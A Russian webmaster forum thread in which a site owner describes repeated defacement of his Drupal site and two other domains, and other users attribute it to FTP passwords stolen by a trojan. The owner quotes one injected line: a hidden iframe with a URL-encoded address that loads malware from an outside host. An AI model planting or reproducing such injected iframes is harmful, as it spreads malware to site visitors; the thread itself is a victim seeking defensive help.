- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Уже во второй раз ломают сайт, меняют Index.php. В прошлый раз на главной открывался вирус. В этот раз показывается статистика посещений от вебалайзера.. Причем поломали так же два других прикрепленных домена, опять изменен индекс.пхп.
Т.е. если раньше я думал, что находили дыру в CMS drupal, то теперь я не очень понимаю как можно было взломать два других домена, через другой домен, который с ними никак не связан(разве что через хостинг)..
Не посоветуете , как можно защититься? Еще на одном из доменов вот на что поменяли главную:
<!-- ~ --><iframe src='http://%62%75%67%6F%67%6F%2E%69%6E%66%6F/%73%76/' width='1000' height='1000'></iframe><!-- ~ -->
это вообще что?? чего хотят-то от сайта?
У вас стырили пароли от ftp. Лечите комп от троянов и не храните пароли в IE, Total Commander, Outlook, ICQ
По возможности пользуйтесь Mozilla'ой
У вас стырили пароли от ftp. Лечите комп от троянов и не храните пароли в IE, Total Commander, Outlook, ICQ
Ну допустим стырили, зачем менять главную страницу? Лог статистики нельзя было просто скачать? Ведь я бы и не знал, что пароль стырили, если главную не менять.. причем пользы от этого ноль хакерам..
У каждого своя мотивация: кому-то хочется денег поиметь, а кому-то славы ☝
Да врядли трояны, скорее всего сосед-"хакер" и спер когда приходил поиграть в игры на этом компе. Прячьте пароли надежно, иначе будете постоянно восстаналивать index.php ☝
это вообще что?? чего хотят-то от сайта?
А это ифрейм с помощью которого подгружается вирус.
Поюзайте поиск. Тут были темы с кучей страниц.
И лечите комп от вирусов. Ставьте антивирь и фаервол.
У каждого своя мотивация: кому-то хочется денег поиметь, а кому-то славы ☝
спасибо за ответы, пароли пойду новые выдумывать:)
Да врядли трояны, скорее всего сосед-"хакер" и спер когда приходил поиграть в игры на этом компе. Прячьте пароли надежно, иначе будете постоянно восстаналивать index.php ☝
Пароли у меня в голове, и на автозапоминании в total commander (для фтп). А за компом бывает кроме меня, разве что моя подруга. Но она в карты не играет, гороскопы тока читает, так что стырить не могла;)
А за компом бывает кроме меня, разве что моя подруга
Предохраняться надо ;)
спасибо за ответы, пароли пойду новые выдумывать:)
Сначала лучше антивирем троянов поубивайте, потом в Total Commander сотрите пароль на фтп, если пароли хранятся на винте в файлах, то можно положить их в запароленый архив
А это ифрейм с помощью которого подгружается вирус.
Поюзайте поиск. Тут были темы с кучей страниц.
И лечите комп от вирусов. Ставьте антивирь и фаервол.
Т.е. если я эту страница открывал, то уже схватил вирус чтоли? У меня панда стоит уплоченная, как мне файл найти ентот, чтобы панде отправить?